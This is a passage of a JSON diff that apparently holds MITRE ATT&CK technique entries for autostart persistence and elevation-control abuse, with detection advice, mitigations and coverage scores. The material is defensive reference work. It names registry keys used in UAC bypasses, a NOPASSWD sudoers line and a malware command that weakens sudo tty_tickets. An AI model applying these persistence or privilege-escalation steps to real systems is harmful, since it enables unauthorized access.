"M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1547.005", + "name": "Boot or Logon Autostart Execution: Security Support Provider", + "url": "https://attack.mitre.org/techniques/T1547/005", + "description": "Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.\n\nThe SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)", + "detection": "Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)", + "mitigations": [ + { + "mid": "M1025", + "name": "Privileged Process Integrity", + "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.", + "url": "https://attack.mitre.org/mitigations/M1025" + } + ] + }, + { + "tid": "T1547.006", + "name": "Boot or Logon Autostart Execution: Kernel Modules and Extensions", + "url": "https://attack.mitre.org/techniques/T1547/006", + "description": "Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) \n\nWhen used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)\n\nKernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation)\n\nAdversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)", + "detection": "Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko (\"kernel object\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\n\nAdversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)\n\nOn macOS, monitor for execution of kextload commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)\n", + "mitigations": [ + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1547.007", + "name": "Boot or Logon Autostart Execution: Re-opened Applications", + "url": "https://attack.mitre.org/techniques/T1547/007", + "description": "Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. \n\nAn adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).", + "detection": "Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1547.008", + "name": "Boot or Logon Autostart Execution: LSASS Driver", + "url": "https://attack.mitre.org/techniques/T1547/008", + "description": "Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)\n\nAdversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.", + "detection": "With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)\n\nUtilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA. ", + "mitigations": [ + { + "mid": "M1043", + "name": "Credential Access Protection", + "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", + "url": "https://attack.mitre.org/mitigations/M1043" + }, + { + "mid": "M1025", + "name": "Privileged Process Integrity", + "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.", + "url": "https://attack.mitre.org/mitigations/M1025" + }, + { + "mid": "M1044", + "name": "Restrict Library Loading", + "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.", + "url": "https://attack.mitre.org/mitigations/M1044" + } + ] + }, + { + "tid": "T1547.009", + "name": "Boot or Logon Autostart Execution: Shortcut Modification", + "url": "https://attack.mitre.org/techniques/T1547/009", + "description": "Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.\n\nAdversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.", + "detection": "Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.\n\nMonitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic)", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1547.010", + "name": "Boot or Logon Autostart Execution: Port Monitors", + "url": "https://attack.mitre.org/techniques/T1547/010", + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.", + "detection": "Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. \n\nMonitor Registry writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)", + "mitigations": [] + }, + { + "tid": "T1547.011", + "name": "Boot or Logon Autostart Execution: Plist Modification", + "url": "https://attack.mitre.org/techniques/T1547/011", + "description": "Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, Info.plist, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description) \n\nAdversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the DYLD_INSERT_LIBRARIES key combined with a path to a malicious dylib under the EnvironmentVariables key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the LSEnvironment key in the application's Info.plist file.(Citation: wardle artofmalware volume1)", + "detection": "Monitor for common command-line editors used to modify plist files located in auto-run locations, such as ~/LaunchAgents, ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm, and an application's Info.plist. \n\nMonitor for plist file modification immediately followed by code execution from ~/Library/Scripts and ~/Library/Preferences. Also, monitor for significant changes to any path pointers in a modified plist.\n\nIdentify new services executed from plist modified in the previous user's session. ", + "mitigations": [ + { + "mid": "M1013", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "url": "https://attack.mitre.org/mitigations/M1013" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1547.012", + "name": "Boot or Logon Autostart Execution: Print Processors", + "url": "https://attack.mitre.org/techniques/T1547/012", + "description": "Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot. \n\nAdversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry key that points to the DLL. For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the GetPrintProcessorDirectory API call.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.", + "detection": "Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\\\[Windows architecture]\\Print Processors\\\\[user defined]\\\\Driver or HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\\\[Windows architecture]\\Print Processors\\\\[user defined]\\Driver as they pertain to print processor installations.\n\nMonitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1547.013", + "name": "Boot or Logon Autostart Execution: XDG Autostart Entries", + "url": "https://attack.mitre.org/techniques/T1547/013", + "description": "Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the /etc/xdg/autostart or ~/.config/autostart directories and have a .desktop file extension.(Citation: Free Desktop Application Autostart Feb 2006)\n\nWithin an XDG autostart entry file, the Type key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The Name key indicates an arbitrary name assigned by the creator and the Exec key indicates the application and command line arguments to execute.(Citation: Free Desktop Entry Keys)\n\nAdversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make XDG autostart entries look as if they are associated with legitimate programs.", + "detection": "Malicious XDG autostart entries may be detected by auditing file creation and modification events within the /etc/xdg/autostart and ~/.config/autostart directories. Depending on individual configurations, defenders may need to query the environment variables $XDG_CONFIG_HOME or $XDG_CONFIG_DIRS to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.\n \nSuspicious processes or scripts spawned in this manner will have a parent process of the desktop component implementing the XDG specification and will execute as the logged on user.", + "mitigations": [ + { + "mid": "M1033", + "name": "Limit Software Installation", + "description": "Block users or groups from installing unapproved software.", + "url": "https://attack.mitre.org/mitigations/M1033" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1547.014", + "name": "Boot or Logon Autostart Execution: Active Setup", + "url": "https://attack.mitre.org/techniques/T1547/014", + "description": "Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nAdversaries may abuse Active Setup by creating a key under HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)\n\nAdversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", + "detection": "Monitor Registry key additions and/or modifications to HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.", + "mitigations": [] + }, + { + "tid": "T1547.015", + "name": "Boot or Logon Autostart Execution: Login Items", + "url": "https://attack.mitre.org/techniques/T1547/015", + "description": "Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled.\n\nLogin items installed using the Service Management Framework leverage launchd, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.\n\nAdversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as tell application “System Events” to make login item at end with properties /path/to/executable.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)", + "detection": "All login items created via shared file lists are viewable by using the System Preferences GUI or in the ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm file.(Citation: Open Login Items Apple)(Citation: Startup Items Eclectic)(Citation: objsee block blocking login items)(Citation: sentinelone macos persist Jun 2019) These locations should be monitored and audited for known good applications.\n\nOtherwise, login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) Monitor applications that leverage login items with either the LSUIElement or LSBackgroundOnly key in the Info.plist file set to true.(Citation: Adding Login Items)(Citation: Launch Service Keys Developer Apple)\n\nMonitor processes that start at login for unusual or unknown applications. Usual applications for login items could include what users add to configure their user environment, such as email, chat, or music applications, or what administrators include for organization settings and protections. Check for running applications from login items that also have abnormal behavior,, such as establishing network connections.", + "mitigations": [] + } + ], + "mitigations": [], + "cumulative_score": 1.577107598662857, + "adjusted_score": 1.577107598662857, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1548", + "name": "Abuse Elevation Control Mechanism", + "description": "Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.", + "url": "https://attack.mitre.org/techniques/T1548", + "tactics": [ + "Defense Evasion", + "Privilege Escalation" + ], + "detection": "Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).\n\nConsider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.\n\nOn Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.\n\nThere are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Metadata", + "File: File Modification", + "Process: OS API Execution", + "Process: Process Creation", + "Process: Process Metadata", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1548.001", + "name": "Abuse Elevation Control Mechanism: Setuid and Setgid", + "url": "https://attack.mitre.org/techniques/T1548/001", + "description": "An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges.\n\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file].\n\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware).", + "detection": "Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1548.002", + "name": "Abuse Elevation Control Mechanism: Bypass User Account Control", + "url": "https://attack.mitre.org/techniques/T1548/002", + "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)", + "detection": "There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.\n\nSome UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:\n\n* The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Classes\\mscfile\\shell\\open\\command Registry key.(Citation: enigma0x3 Fileless UAC Bypass)\n\n* The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe and [HKEY_CURRENT_USER]\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)\n\nAnalysts should monitor these Registry settings for unauthorized changes.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1052", + "name": "User Account Control", + "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "url": "https://attack.mitre.org/mitigations/M1052" + } + ] + }, + { + "tid": "T1548.003", + "name": "Abuse Elevation Control Mechanism: Sudo and Sudo Caching", + "url": "https://attack.mitre.org/techniques/T1548/003", + "description": "Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\n\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\n\nThe sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though.\n\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.\n\nIn the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.", + "detection": "On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1548.004", + "name": "Abuse Elevation Control Mechanism: Elevated Execution with Prompt", + "url": "https://attack.mitre.org/techniques/T1548/004", + "description": "Adversaries may leverage the 